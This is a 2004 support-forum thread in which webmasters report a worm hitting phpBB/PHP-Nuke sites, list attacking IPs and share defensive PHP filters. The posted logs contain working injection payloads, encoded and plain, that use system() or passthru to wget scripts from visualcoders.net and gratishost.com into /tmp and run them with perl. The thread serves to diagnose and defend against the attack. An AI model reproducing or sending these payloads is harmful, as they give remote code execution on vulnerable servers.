| Author |
Message |
64bitguy
The Mouse Is Extension Of Arm
Joined: Mar 06, 2004
Posts: 1164
|
 Posted:
Sat Dec 25, 2004 12:09 pm |
|
In an effort to identify who is infected by this is a worm or virus, I'm enclosing a copy of a few of the IPs that have attacked my site so far.
I'm very curious to discover the root cause of these attacks (failed to update? No anti-virus?) and identifying the sources may aid in this venture while helping others to filter out some of the hosts affected.
Here are SOME of the multiple abuse attempt IPs that I have collected so far:
63.247.87.186 = shell.konta.pl
62.2.78.10 = 62-2-78-10.business.cablecom.ch
62.212.81.12 = ns2.jronline.nl
69.73.166.108 = platinum.nocdirect.com
69.64.34.168 = air302.startdedicated.com
67.19.107.242 = 242-107-19-67.reverse.sunrisenet.com.br
80.237.130.27 = server019.webpack.hosteurope.de
66.194.239.69 = dime54.dizinc.com
216.201.96.65 = vs1.korax.net
67.18.14.98 = ns1.hostdnsserver.com
67.15.84.41 = spark.mojoservers.net
67.19.5.50 = 50.67-19-5.reverse.theplanet.com
195.246.156.14 = microscoop.server.vianetworks.fr
204.50.22.10 = server12.dayanadns.com
217.115.142.89 = hydrogen.webpack.hosteurope.de
62.173.67.22 = fastwebhosting.net
And many many more! |
_________________
Steph Benoit
100% Section 508 and W3C HTML5 and CSS Compliant (Truly) Code, because I love compliance.
Last edited by 64bitguy on Sat Dec 25, 2004 2:45 pm; edited 2 times in total |
|
|
|
Mesum
Useless
Joined: Aug 23, 2002
Posts: 213
Location: Chicago
|
| Posted:
Sat Dec 25, 2004 1:02 pm |
|
I was bombed early this morning by visualcoders.net which was using some stupid kinda strings.
Their host was informed and they removed the account right away then domain whois showed that the owner is from Belgium so I just called FBI and let then know about this. They said they already know about it and they think it is just another worm that is supposed to run this sting to every phpBB, PHP-Nuke, Postnuke or any other related code. They are trying to find it and stop it.
These were the strings they were using: |
_________________
Only registered users can see links on this board! Get registered or login! |
|
|
|
zaki
New Member
Joined: Oct 12, 2004
Posts: 9
|
| Posted:
Sat Dec 25, 2004 2:04 pm |
|
I am getting like 500 emails daily since two days, all with reasons like Reason: Abuse-Script or Abuse-Harvest, the only comon thing between all attacks is the agent which is
--------------------
User Agent: lwp-trivial/1.32
examples
Date & Time: 2004-12-25 12:51:57
Blocked IP: 217.199.176.8
User ID: Anonymous (1)
Reason: Abuse-Harvest
String Match: lwp-trivial
--------------------
User Agent: lwp-trivial/1.32
Query String: www.mysite.net/portal/modules.php?name=Forums&file=viewtopic&t=10759
Forwarded For: none
Client IP: none
Remote Address: 217.199.176.8
Remote Port: 4388
Request Method: GET
--------------------
Who-Is for IP
217.199.176.8
Date & Time: 2004-12-25 12:24:45
Blocked IP: 81.169.168.253
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: lwp-trivial/1.38
Query String: www.mysite.net/portal/modules.php?name=Forums&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(115)%252echr(112)%252echr(121)%252echr(9 %252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(122)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(115)%252echr(112)%252echr(121)%252echr(9%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527
Forwarded For: none
Client IP: none
Remote Address: 81.169.168.253
Remote Port: 45814
Request Method: GET
or this new one
Date & Time: 2004-12-25 14:22:16
Blocked IP: 69.93.214.106
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.65
Query String: www.mysite.net/portal/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20http://fff.gratishost.com/sess_0bc3910d07edb36750a9babbd179edb2;perl%20sess_0bc3910d07edb36750a9babbd179edb2;wget%20http://fff.gratishost.com/wow.a;perl%20wow.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
Forwarded For: none
Client IP: none
Remote Address: 69.93.214.106
Remote Port: 41817
Request Method: GET
what is this gratishost.com ???
another Email with this which is a normal script to one of the forums, why blocked ?
Date & Time: 2004-12-25 14:18:02
Blocked IP: 69.44.57.36
User ID: Anonymous (1)
Reason: Abuse-Harvest
String Match: lwp-trivial
--------------------
User Agent: lwp-trivial/1.41
Query String: www.mysite.net/portal/modules.php?name=Forums&file=viewtopic&t=10815
Forwarded For: none
Client IP: none
Remote Address: 69.44.57.36
Remote Port: 46860
Request Method: GET
I wish someone can help me with this, it started two days ago, now i get tons of Emails from sentinel, any ideas ? |
Last edited by zaki on Sat Dec 25, 2004 2:31 pm; edited 3 times in total |
|
|
|
|
64bitguy
|
| Posted:
Sat Dec 25, 2004 2:26 pm |
|
Update:
According to multiple hosts contacted, the following information has been identified:
It looks like http://fff.gratishost.com and http://www.visualcoders.net are hosting the worm source-code and aiding in propogation.
There is now an official FBI investigation in progress.
Webmasters attacked by this worm are urged to:
1) Contact each host of each attacking domain to advise them to do a virus scan to identify and remove the worm from affected domains.
2) Advise those hosts to notify domain administrators to update their software so as not to be exposed or further vulnerable to the worm.
2A) Also advise hosts of the domain(s) affected that should webmasters fail to update their software immediately (so as not to be susceptible to the worm), that the domain(s) affected should be deactivated until such a time where they do not pose a threat of re-infection and further propagation to others.
This is a situation where people have failed to update their software as advised and thus they are propagating the problem.
There are also a large number of clients attempting to test successful implementation and infection of the worm. Those client IP addresses are also being collected and reported to the FBI for investigation.
While many of these clients are on dial-up, the seriousness of this attack and the involvement of the FBI has led to a great deal of cooperation with ISPs in tracking those involved.
I'll keep you apprised of more information as it becomes available. |
| |
|
|
|
|
SuperCat
Hangin' Around
Joined: Nov 27, 2004
Posts: 37
Location: MN
|
| Posted:
Sun Dec 26, 2004 11:16 am |
|
Ok, i figured out that its showing up in here anyways. but is wayyyyyyy off to the right side...
I wrote a nice little protection for this so your bandwidth wont get eaten up...
place this in /includes/custom_files/custom_mainfile.php
Code:if (eregi("wget", $_SERVER['QUERY_STRING'])) {
die();
}
|
|
_________________
How deep can we dig the rabbit hole? |
|
  
|
|
zaki
|
| Posted:
Sun Dec 26, 2004 12:22 pm |
|
supercat, who are you replying to pls ? me ?
thanks, |
| |
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
| Posted:
Sun Dec 26, 2004 12:26 pm |
|
| SuperCat wrote: | Ok, i figured out that its showing up in here anyways. but is wayyyyyyy off to the right side...
I wrote a nice little protection for this so your bandwidth wont get eaten up...
place this in /includes/custom_files/custom_mainfile.php
Code:if (eregi("wget", $_SERVER['QUERY_STRING'])) {
die();
}
|
|
If it reaches this script, the band width has already been used. Not too sure what this accomplishes (no offense). |
| |
|
|
|
|
SuperCat
|
| Posted:
Sun Dec 26, 2004 12:38 pm |
|
the rest of the page wont load. it saves that much. |
| |
|
|
|
|
sixonetonoffun
Spouse Contemplates Divorce
Joined: Jan 02, 2003
Posts: 2496
|
| Posted:
Sun Dec 26, 2004 1:17 pm |
|
The authorities will probably have as much success with the brazilian ISP's as we do. |
_________________
[b][size=5]openSUSE 11.4-x86 | Linux 2.6.37.1-1.2desktop i686 | KDE: 4.6.41>=4.7 | XFCE 4.8 | AMD Athlon(tm) XP 3000+ | MSI K7N2 Delta-L | 3GB Black Diamond DDR
| GeForce 6200@433Mhz 512MB | Xorg 1.9.3 | NVIDIA 270.30[/size:2b8 |
|
|
|
|
SuperCat
|
| Posted:
Sun Dec 26, 2004 6:09 pm |
|
Here is my final code:
Code:if (eregi("wget", $_SERVER['QUERY_STRING'])) {
require_once("config.php");
require_once("db/db.php");
global $db, $prefix;
$ip = $_SERVER["REMOTE_ADDR"];
$sql = "select * from ".$prefix."_banned_ip WHERE ip_address ='$ip'";
$result = $db->sql_query($sql);
$IPexists = $db->sql_fetchrow($result);
if ($IPexists == '') {
$date = date("Y-m-d");
$db->sql_query("INSERT INTO ".$prefix."_banned_ip (ip_address,reason,date) VALUES ('$ip', 'wget in URL', '$date')");
$db->sql_query("DELETE FROM ".$prefix."_session WHERE host_addr='$ip'");
}
die();
}
|
|
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
